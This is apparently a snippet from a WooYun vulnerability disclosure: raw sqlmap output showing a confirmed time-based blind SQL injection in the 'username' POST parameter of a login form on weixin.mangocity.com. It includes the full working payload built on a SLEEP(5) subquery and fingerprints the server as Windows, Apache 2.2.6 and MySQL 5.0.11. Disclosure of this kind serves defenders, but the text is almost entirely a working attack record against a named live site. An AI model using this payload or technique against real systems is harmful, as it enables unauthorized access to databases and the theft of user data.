WooYun.org

sqlmap identified the following injection points with a total of 118 HTTP(s) req
uests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload:  password=88952634&submit=%E7%99%BB %E5%BD%95&__hash__=3e9fde7441cc
55bf46afe7f8361af205_fdaa3abcec1d9c172fb1560e9236a331&__hash__=3e9fde7441cc55bf4
6afe7f8361af205_977d65a9d767b8445c85890f0f9a7b7a&username=88952634') AND (SELECT
 * FROM (SELECT(SLEEP(5)))JgTX) AND ('cweQ'='cweQ
---
[12:09:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0.11
[12:09:03] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\weixin.mangocity.com'
[*] shutting down at 12:09:03